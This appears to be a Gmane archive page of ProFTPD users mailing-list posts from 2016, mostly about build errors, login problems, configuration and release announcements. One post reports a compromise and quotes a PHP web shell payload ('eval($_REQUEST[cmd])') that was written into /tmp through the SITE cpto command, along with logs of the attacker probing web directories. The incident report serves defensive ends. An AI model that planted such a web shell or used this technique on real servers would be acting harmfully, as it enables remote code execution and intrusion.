- - | 25 Apr 16:48 2016

[Proftpd-user] After building proftpd, passwords fail to log in

I have built proftpd from source, and having a problem with passwords.  All accounts fail with incorrect passwords, even though I know that they passwords are correct.  I am building proftpd as follows:


install_user=whb3bqj install_group=gic ./configure --prefix=/home/whb3bqj/proftpd/usr --sysconfdir=/home/whb3bqj/proftpd/etc --localstatedir=/home/whb3bqj/proftpd/var LIBS=-lodbc --with-modules=mod_sql:mod_sql_odbc:mod_sftp


Suggestions appreciated.


--

Geoffrey Myers

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
Ariel Mannelli | 22 Apr 17:55 2016
Picon

[Proftpd-user] Problem login from localhost

Hello everyone!

I have a ProFTP running on a Debian machine. Works fine trought wan connection, but I recieve a "incorrect password" login from localhost or trough the lan.

Users are on AD server.

any clue??

Many thnks!
--
Ariel Mannelli

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
Lists | 12 Apr 19:43 2016

[Proftpd-user] Compile error

I'm trying to compile proftpd with odbc/sql support.  I'm receiving the following error:

undefined reference to SQLGetDiagRec

Any suggestions would be appreciated. 

This is on Red Hat el 5.11

--
Geoffrey Myers

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Tomasz Chmielewski | 7 Apr 17:54 2016

[Proftpd-user] proftpd 1.3.5 vulnerable?

Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed 
as of today.

   proftpd-basic                    1.3.5~rc3-2.1ubuntu2                  
  amd64

Found a weird file:

# ls -la /tmp|grep eval
-rw-r--r--  1 proftpd  nogroup       85 Apr  7 14:21 .<?php 
eval($_REQUEST[cmd]); echo GOOD;?>

# cat /tmp/.*eval*
proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); 
echo GOOD;?>

There are no anonymous users, there is no trace in the logs about any 
valid user logging in around 14:21, Apr 7.

Except these:

2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,428 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,820 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/img/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,302 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,882 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:55,403 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/img/infos.php' for copying: No such file or directory
(...)
2016-04-07 14:21:59,207 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): FTP session closed.

And the list goes on. It only logs about the files it didn't find; it 
doesn't log about the files it did found or uploaded - apparently the 
attacker had access to the whole server as "proftpd" user.

Is it a known problem? For now, switched off proftpd.

Tomasz Chmielewski
http://wpkg.org

------------------------------------------------------------------------------
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

TJ Saunders | 31 Mar 17:47 2016
Gravatar

[Proftpd-user] Testers for an AWS-specific module for ProFTPD?


I've been perusing posts on StackOverflow and related sites lately, and
have seen many folks having issues with running proftpd on an EC2
instance in AWS.  Mostly this relates to FTP's multiple TCP connection,
and the usual router/NAT/firewall fun required to make the data
transfers work.

To try to help these folks, I wrote up a ProFTPD AWS howto:

  http://www.proftpd.org/docs/howto/AWS.html

and a mod_aws module, which can (hopefully) suggest necessary config
changes (or make them itself); see:

  https://github.com/Castaglia/proftpd-mod_aws/

It's a work-in-progress, of course; you can see existing feature
requests/bugs filed that I need to fix:

  https://github.com/Castaglia/proftpd-mod_aws/issues

But I feel that mod_aws is at a point now where having a few other folks
try it out (assuming you use AWS), help shake out more issues and make
it more production-ready, would be quite useful.  So if you use ProFTPD
on EC2 instances in AWS, and would like to help out, please try out the
module, let me know how it goes.

Cheers,
TJ

------------------------------------------------------------------------------
Transform Data into Opportunity.
Accelerate data analysis in your applications with
Intel Data Analytics Acceleration Library.
Click to learn more.
http://pubads.g.doubleclick.net/gampad/clk?id=278785471&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Matus UHLAR - fantomas | 22 Mar 01:15 2016
Picon

[Proftpd-user] geoip on debian wheezy

Hello,

anyone used mod_geopi on debian wheezy?
I have tried to turn it on, but the debug log doesn't show anything about it
working:

LoadModule mod_geoip.c
GeoIPEngine on

GeoIPLog /var/log/proftpd/geoip.log
GeoIPTable /usr/share/GeoIP/GeoIP.dat MemoryCache UTF8
GeoIPAllowFilter CountryCode (SK)

(GeoIPPolicy is not available yet).

whenI log on (SSL) I only see these logs related to geoip:

cloud.zvjs.sk proftpd[19472]: loading 'mod_geoip.c'
...
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPEngine
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPLog
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPTable
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPAllowFilter
...
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: mod_geoip/0.3: loading static GeoIP tables
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: ROOT PRIVS at mod_geoip.c:353
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: RELINQUISH PRIVS at mod_geoip.c:355
...
connect:
...
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): ROOT PRIVS at mod_geoip.c:1122
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): RELINQUISH
PRIVS at mod_geoip.c:1124
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]):
mod_geoip/0.3: loading session GeoIP tables
...
auth tls, login, pass
...
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPEngine
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPLog
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPTable
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPAllowFilter

any idea where could the problem be?

--

-- 
Matus UHLAR - fantomas, uhlar <at> fantomas.sk ; http://www.fantomas.sk/
Warning: I wish NOT to receive e-mail advertising to this address.
Varovanie: na tuto adresu chcem NEDOSTAVAT akukolvek reklamnu postu.
How does cat play with mouse? cat /dev/mouse

------------------------------------------------------------------------------
Transform Data into Opportunity.
Accelerate data analysis in your applications with
Intel Data Analytics Acceleration Library.
Click to learn more.
http://pubads.g.doubleclick.net/gampad/clk?id=278785351&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

TJ Saunders | 11 Mar 02:54 2016
Gravatar

[Proftpd-user] ProFTPD 1.3.6rc2 released!


Hello, ProFTPD community. The ProFTPD Project team is pleased to
announce that the second release candidate for ProFTPD 1.3.6 is now
available for public consumption.

You can download 1.3.6rc2, including PGP signatures and MD5 sums, from
the alternate download site, hosted by GitHub:

  https://github.com/proftpd/proftpd/archive/v1.3.6rc2.tar.gz

Alternatively, you can download proftpd from the main site:

  ftp://ftp.proftpd.org/distrib/source

RPMs, once available, will be placed here:

  ftp://ftp.proftpd.org/distrib/packages/RPMS

The 1.3.6rc2 release includes major new features and numerous bugfixes,
including:

  + Support for TLS session tickets and OCSP stapling
  + Multi-factor authentication via the new mod_auth_otp module
  + Support for the HASH command via the new mod_digest, for file
    checksums

Please read the included NEWS, RELEASE_NOTES, and ChangeLog files for
the full details.

The MD5 sum for the source tarball is:

  8234dfd6d975d3ae77525696af289c08  proftpd-1.3.6rc2.tar.gz

The PGP signature for the source tarball is:

  proftpd-1.3.6rc2.tar.gz:

    
TJ Saunders | 11 Mar 02:53 2016
Gravatar

[Proftpd-user] ProFTPD 1.3.5b released!


Hello, ProFTPD community. The ProFTPD Project team is pleased to
announce
that the second maintenance release for ProFTPD 1.3.5 is now available
for
public consumption.

You can download 1.3.5b, including PGP signatures and MD5 sums, from
the alternate download site, hosted by GitHub:

  https://github.com/proftpd/proftpd/archive/v1.3.5b.tar.gz

Alternatively, you can download proftpd from the main site:

  ftp://ftp.proftpd.org/distrib/source

RPMs, once available, will be placed here:

  ftp://ftp.proftpd.org/distrib/packages/RPMS

The 1.3.5b release is a maintenance release, containing various fixes
backported from the 1.3.6 development cycle.

Please read the included NEWS and ChangeLog files for the full details.

The MD5 sum for the source tarball is:

  f7b8e3a383b34a894c2502db74ccccde  proftpd-1.3.5b.tar.gz

The PGP signature for the source tarball is:

  proftpd-1.3.5b.tar.gz:

    
covici | 29 Feb 21:41 2016

[Proftpd-user] problem setting up virtual server with proftpd

Hi.  I have a situation where I want to have an ftp server where each
user has his own password but they all wind up in the same directory and
can upload and download to that directory.

So, what I did I used proftpd and added a virtual host and since I only
have one ip address, I added a port command and a defaultroot command
like this
<virtualhost   ftp.covici.com>
port 2121
umask 007
defaultroot /home/krn_to_transcribe ftpgroup
</virtualhost>
so, I logged in with a user and it logged in successfully, but when I
tried to even list the directory, it would time out.  Firewall rules
look OK, so I wonder what is happening here?

Here is  my complete config:
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anonymous access.

ServerName			"ProFTPD Default Installation"
ServerType			standalone
DefaultServer		on
port 21
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit the maximum number of processes per service
# (such as xinetd).
MaxInstances		30

# Set the user and group under which the server will run.
User				proftpd
Group				proftpd

<global>
RequireValidShell	off
AuthPAM				off
#AuthPAMConfig		ftp
# Port 21 is the standard FTP port.
PassivePorts 49152 49552
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask				022

# Normally, we want files to be overwriteable.
#<Directory />
	AllowOverwrite		on
#</Directory>
DefaultRoot ~ !covici
</global>
# A basic anonymous configuration, with no upload directories.
#<Anonymous ~ftp>
#	User				ftp
#	Group				ftp

	# We want clients to be able to login with "anonymous" as well as "ftp".
#	UserAlias			anonymous ftp

	# Limit the maximum number of anonymous logins.
#	MaxClients			10

	# We want 'welcome.msg' displayed at login, and '.message' displayed
	# in each newly chdired directory.
#	DisplayLogin			welcome.msg
#	DisplayFirstChdir		.message

	# Limit WRITE everywhere in the anonymous chroot.
#	<Limit WRITE>
#		DenyAll
#	</Limit>
#</Anonymous>
<virtualhost   ftp.covici.com>
port 2121
umask 007
defaultroot /home/krn_to_transcribe ftpgroup
</virtualhost>

Thanks in advance for any suggestions.

-- 
Your life is like a penny.  You're going to lose it.  The question is:
How do
you spend it?

         John Covici
         covici <at> ccs.covici.com

------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=272487151&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Alex Domoradov | 23 Feb 23:41 2016
Picon

[Proftpd-user] chroot after rewriting home dir doesn't work as expected

Hello,

I'm using the following settings with ProFTPD 1.3.5a

<VirtualHost sftp.example.net>
    ServerName "SFTP: Backup server."
    DefaultRoot ~
    Umask 002
    Port 2121

    RootRevoke on

    AuthUserFile /etc/proftpd/sftp_virtual_users.conf

    SFTPEngine on
    SFTPLog /var/log/proftpd/sftp.log
    SFTPHostKey /etc/ssh/ssh_host_rsa_key
    SFTPHostKey /etc/ssh/ssh_host_dsa_key
    SFTPAuthorizedUserKeys file:/etc/proftpd/sftp_users
    SFTPCompression delayed
    SFTPAuthMethods publickey
    SFTPDHParamFile /etc/pki/proftpd/dhparam_2048.pem

    RewriteHome on
    RewriteEngine on
    RewriteLog /var/log/proftpd/rewrite.log
    RewriteCondition %m REWRITE_HOME
    RewriteRule (.*) /vhosts/backup/%U
</VirtualHost>

The password file contain only one line

# cat /etc/proftpd/sftp_virtual_users.conf
user1:{HASH}:99:99::/vhosts/backup/:/sbin/nologin

according to a log files

2016-02-23 22:32:46,871 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): mod_cap/1.1: adding CAP_SETUID and CAP_SETGID capabilities
2016-02-23 22:32:46,871 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): SSH2 session opened.
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): Preparing to chroot to directory '/vhosts/backup/user1'
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): Environment successfully chroot()ed
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): USER user1: Login successful
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): REVOKE PRIVS: unable to seteuid(): Operation not permitted
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): RootRevoke in effect, dropped root privs
2016-02-23 22:32:46,950 sftp.example.net proftpd[53242] sftp.example.net (192.168.1.2[192.168.1.2]): USER user1: Login successful.


2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_match_cond(): checking regex cond against 'REWRITE_HOME'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_fixup(): condition met
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_fixup(): executing RewriteRule
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): original pattern: '/vhosts/backup/%U'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): rule backref subst'd pattern: '/vhosts/backup/%U'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): pattern '/vhosts/backup/%U' had no cond backrefs
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst_vars(): replacing variable '%U' with 'user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): var subst'd pattern: '/vhosts/backup/user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_parse_map_str(): parsing '/vhosts/backup/user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): maps subst'd pattern: '/vhosts/backup/user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_subst(): env subst'd pattern: '/vhosts/backup/user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrite_fixup(): REWRITE_HOME arg now '/vhosts/backup/user1'
2016-02-23 22:32:46,950 mod_rewrite/0.9[53242]: rewrote home to be '/vhosts/backup/user1'

The home should be set to /vhosts/backup/user1, but in FileZilla I see content of the /vhosts/backup/.

Did I miss something?

Thanks in advance
------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=272487151&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
BROCKHOVEN Werner (EXT | 15 Feb 19:09 2016

[Proftpd-user] Login timeout exceeded, disconnected

Hi all,

 

Can anybody advice which tracing / debugging we should enable to get more details on the ‘Login timeout exceeded, disconnected’ message?

 

The message occurs well before (within 20 seconds) the default 300 seconds timeout and even after the correct user password is provided.  We suspect this is due to an issue with the OS (Red Hat 7.1) and not so much with proftpd itself.

 

Running 1.3.5a with following configuration.

 

Trace                           DEFAULT:0

 

ServerName                      "Eurocontrol CFMU - ProFTPD server"

ServerIdent                     on "FTP Server"

ServerType                      standalone

Systemlog                       /var/log/proftpd/proftpd.log

DefaultServer                   on

Port                            21

UseIPv6                         off

DefaultRoot                     ~

<IfModule mod_auth_pam.c>

   AuthPAM                      on

   AuthPAMConfig                proftpd

   AuthOrder                    mod_auth_pam.c* mod_auth_unix.c

</IfModule>

PersistentPasswd                off

UseReverseDNS                   off

User                            nobody

Group                           nobody

Umask                           022

MaxInstances                    300

UseSendfile                     off

LogFormat                       default "%h %l %u %t \"%r\" %s %b"

LogFormat                       auth    "%v [%P] %h %t \"%r\" %s"

LoadModule mod_ctrls_admin.c

LoadModule mod_vroot.c

<IfModule mod_vroot.c>

  VRootEngine                   on

</IfModule>

<Global>

  # Umask 022 is a good standard umask to prevent new dirs and files

  # from being group and world writable

  Umask                         022

  # Allow users to overwrite files and change permissions

  AllowOverwrite                on

  <Limit SITE_CHMOD>

    DenyAll

  </Limit>

</Global>

 

 

 

Regards,

 

Werner Brockhoven

NM CIP MS (22.138)

Email: werner.brockhoven <at> eurocontrol.int
Tel CIP MS: 92662

Tel CIP MS: +32 (0)2 730 26 62

EUROCONTROL
96 Rue de la Fusée, 1130 Brussels, Belgium

Follow us on:
Web 
| Twitter | Facebook | Youtube | Flickr | Linkedin

 

____

This message and any files transmitted with it are legally privileged and intended for the sole use of the individual(s) or entity to whom they are addressed. If you are not the intended recipient, please notify the sender by reply and delete the message and any attachments from your system. Any unauthorised use or disclosure of the content of this message is strictly prohibited and may be unlawful.

Nothing in this e-mail message amounts to a contractual or legal commitment on the part of EUROCONTROL, unless it is confirmed by appropriately signed hard copy.

Any views expressed in this message are those of the sender.
------------------------------------------------------------------------------
Site24x7 APM Insight: Get Deep Visibility into Application Performance
APM + Mobile APM + RUM: Monitor 3 App instances at just $35/Month
Monitor end-to-end web transactions and take corrective actions now
Troubleshoot faster and improve end-user experience. Signup Now!
http://pubads.g.doubleclick.net/gampad/clk?id=272487151&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Gmane